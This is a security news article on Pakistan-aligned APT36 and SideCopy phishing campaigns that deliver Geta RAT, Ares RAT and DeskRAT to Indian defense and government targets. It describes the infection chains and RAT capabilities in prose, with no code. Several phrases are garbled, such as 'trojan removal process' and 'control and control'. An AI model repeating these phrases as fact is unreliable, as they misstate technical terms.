APT36 and SideCopy Launch Cross-Platform RAT Campaigns Against Indian Organizations
India’s security sector and government-related organizations have been targeted by several campaigns designed to infect Windows and Linux environments with remote access trojans capable of stealing sensitive data and ensuring continued access to infected machines.
The campaigns are characterized by the use of malware families such as Geta RAT, Ares RAT, and DeskRAT, often referred to as Pakistan-aligned threat groups that are tracked like SideCopy and APT36 (aka Transparent Tribe). SideCopy, which has been active since at least 2019, is being tested to work as a subset of Transparent Tribe.
“Taken together, these campaigns reinforce a familiar yet emerging narrative,” said Aditya K. Sood, vice president of Security Engineering and AI Strategy at Aryaka. “Transparent Tribe and SideCopy aren’t reinventing espionage – they’re refining it.”
“By expanding cross-platform coverage, relying on in-memory strategies, and experimenting with new delivery vectors, this ecosystem continues to operate under noise while maintaining strategic focus.”
Common to all campaigns is the use of phishing emails that contain malicious attachments or embedded download links that lead the target to infrastructure controlled by the attacker. These early accessors serve as a conduit for Windows shortcuts (LNK), ELF binaries, and PowerPoint Add-In files that, when opened, initiate a multi-stage trojan removal process.
The malware families are designed to provide persistent remote access, enable system re-examination, collect data, execute commands, and direct long-term post-compromise operations in both Windows and Linux environments.
One of the attack chains is as follows: a malicious LNK file requests “mshta.exe” to execute an HTML Application (HTA) file hosted on compromised legitimate domains. The HTA payload contains JavaScript to decrypt the embedded DLL payload, which, in turn, processes the embedded data blob to write a decoy PDF to disk, connect to a hard coded control and control (C2) server, and display the saved decoy file.
After the lure document is displayed, the malware checks the installed security products and adapts its persistence method accordingly before installing the Geta RAT on the vulnerable host. It is worth noting that this series of attacks was detailed by CYFIRMA and Seqrite Labs researcher Sathwik Ram Prakki in late December 2025.
Geta RAT supports various commands to gather system information, enumerate running processes, terminate a specific process, list installed applications, collect information, retrieve and replace clipboard contents with data provided by the attacker, capture screenshots, perform file operations, execute arbitrary shell commands, and harvest data from connected USB devices.
Running alongside this Windows-centric campaign is a Linux variant that uses the Go binary as a starting point to drop the Python-based Ares RAT by using a shell script downloaded from an external server. Like the Geta RAT, the Ares RAT can also use multiple commands to harvest sensitive data and execute Python scripts or commands issued by a threat actor.
Aryaka said he also noticed another campaign where the Golang malware, DeskRAT, was delivered via a hard PowerPoint Add-In file that used an embedded macro to establish an outgoing connection to a remote server to download the malware. The APT36 implementation of DeskRAT was written by Sekoia and QiAnXin XLab in October 2025.
“These campaigns show a resourceful, intelligence-oriented actor who has deliberately targeted India’s defense, government, and strategic sectors by using security threads, forged official documents, and trusted infrastructure in the region,” the company said. “The work extends beyond defense to policy, research, critical infrastructure, and defense-related organizations operating within a common trusted ecosystem.”
“Deployment of the Desk RAT, alongside the Geta RAT and Ares RAT, underscores an evolving toolkit optimized for stealth, persistence, and long-term reach.”
